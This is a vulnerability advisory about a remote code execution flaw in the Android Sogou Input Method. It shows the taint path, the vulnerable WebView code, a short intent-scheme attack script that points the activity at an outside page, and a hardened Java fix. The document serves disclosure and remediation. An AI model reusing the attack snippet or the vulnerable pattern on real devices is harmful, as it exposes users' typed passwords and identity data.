Sogou Input Method remote code execution can maliciously hijack user input
Sogou Input Method can be exploited for remote code execution; once the input process is controlled, everything the user types, including passwords, is exposed in plain view.
The latest version of Sogou Input Method (7.2.2) does not properly validate the data parameter of an incoming intent and passes it directly to a WebView that exposes a JavaScript interface, resulting in code execution. At the same time, because the targetSDK of Sogou Input Method is too low, all Android devices <= 4.4.2 are affected.
0x01:
JADE static detection finds the following taint path:
Taint source:
    $r3 = virtualinvoke $r0.<sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity: android.content.Intent getIntent()>() on line 107 in method <sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity: void onCreate(android.os.Bundle)>
Taint path:
    $r3 = virtualinvoke $r2.<java.lang.String: android.content.Intent getDataString()>() on line 112 in method <sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity: void processExtraData(android.content.Intent)>
Taint sink:
    $r2.<com.tencent.smtt.sdk.WebView$SystemWebView: void loadUrl(java.lang.String)>($r1) on line 780 in method <com.tencent.smtt.sdk.WebView: void loadUrl(java.lang.String)>
Call chain: onCreate -> processExtraData -> loadUrl
On its own this allows phishing and cross-domain file reading. However, there is a more serious problem.
0x02:
Static detection also found that MiniWebViewActivity calls addJavascriptInterface, and the targetSDK of this APK is 7 (Android 2.1). As a result, the addJavascriptInterface vulnerability extends to every Android device using this WebView, that is, all versions <= 4.4.2. According to Umeng, that covers 95% of Android devices in China.
Because of the key position of an input method application, it sees every piece of content the user types. After the input process is controlled, the input of all users, including passwords and ID card numbers, is unavoidably exposed.
    @SuppressLint(value={"SetJavaScriptEnabled"})
    private void initWebView() {
        LogUtil.i("Mini WebView", "-------- init webview -------");
        /* omitted */
        this.mWebView.addJavascriptInterface(new ContextShareInterface(), "sogoumse_interface");
        this.mWebView.requestFocus();
    }
Using the intent scheme expands this issue to remote code execution
Problem code:
    private void processExtraData(Intent arg3) {
        if(arg3 != null && ("android.intent.action.VIEW".equals(arg3.getAction())) && arg3.getData() != null) {
            this.recreateWebView();
            this.mWebView.loadUrl(arg3.getDataString());
        }
    }
Code execution example: writing a file onto the sdcard
Android 4.3 is still affected
Remote attack code:
<script>
location.href = "intent:http://myqsc.sinaapp.com/fuck.html#Intent;SEL;component=com.sohu.inputmethod.sogou/sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity;end";
</script>
Solution:
Validate incoming URLs before loading them, and raise the targetSDK so that only methods annotated with @JavascriptInterface are exposed to page script.
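The following is an added example of what the fix looks like in code; it is not Sogou's code and is not taken from the decompiled APK. It assumes a minimal activity layout, an allowlist of hosts (the host name sogou.com used here is a placeholder assumption), and a hypothetical ContextShareInterface with a single annotated method. The manifest change it relies on (android:targetSdkVersion 17 or higher) is shown in a comment.

```java
import android.annotation.SuppressLint;
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Hardened counterpart of the vulnerable MiniWebViewActivity (added example, not the vendor's code).
// Required manifest change (assumption about the project's manifest layout):
//   <uses-sdk android:minSdkVersion="..." android:targetSdkVersion="17" />
// With targetSdkVersion >= 17 the WebView only exposes methods carrying @JavascriptInterface,
// so page script can no longer reach arbitrary Java via reflection on the injected object.
public class MiniWebViewActivity extends Activity {

    // Placeholder allowlist: only hosts the mini browser is meant to display.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("www.sogou.com", "sogou.com"));

    private WebView mWebView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        setContentView(mWebView);
        initWebView();
        processExtraData(getIntent());
    }

    @SuppressLint("SetJavaScriptEnabled")
    private void initWebView() {
        mWebView.getSettings().setJavaScriptEnabled(true);
        // Same interface name as in the advisory; only annotated methods are callable from JS.
        mWebView.addJavascriptInterface(new ContextShareInterface(), "sogoumse_interface");
        mWebView.requestFocus();
    }

    // Accepts only http/https URLs whose host is on the allowlist.
    // Rejects file:, content:, javascript: and intent: data, which is what the
    // intent-scheme attack relies on being passed straight to loadUrl().
    static boolean isAllowedUrl(String url) {
        if (url == null) {
            return false;
        }
        Uri uri = Uri.parse(url);
        String scheme = uri.getScheme();
        if (scheme == null) {
            return false;
        }
        scheme = scheme.toLowerCase(Locale.ROOT);
        if (!scheme.equals("http") && !scheme.equals("https")) {
            return false;
        }
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    // Fixed version of the vulnerable method: the intent data is validated before it is loaded.
    private void processExtraData(Intent intent) {
        if (intent == null
                || !Intent.ACTION_VIEW.equals(intent.getAction())
                || intent.getData() == null) {
            return;
        }
        String url = intent.getDataString();
        if (!isAllowedUrl(url)) {
            // Refuse unexpected URLs instead of rendering attacker-chosen content.
            finish();
            return;
        }
        mWebView.loadUrl(url);
    }

    // Hypothetical bridge object; only the annotated method is reachable from page script.
    static class ContextShareInterface {
        @JavascriptInterface
        public String getVersion() {
            return "7.2.2";
        }
    }
}
```

If the activity does not need to be launched by other apps at all, marking it android:exported="false" in the manifest removes the intent-scheme entry point entirely; the allowlist check above remains useful because the activity still receives data from within the app.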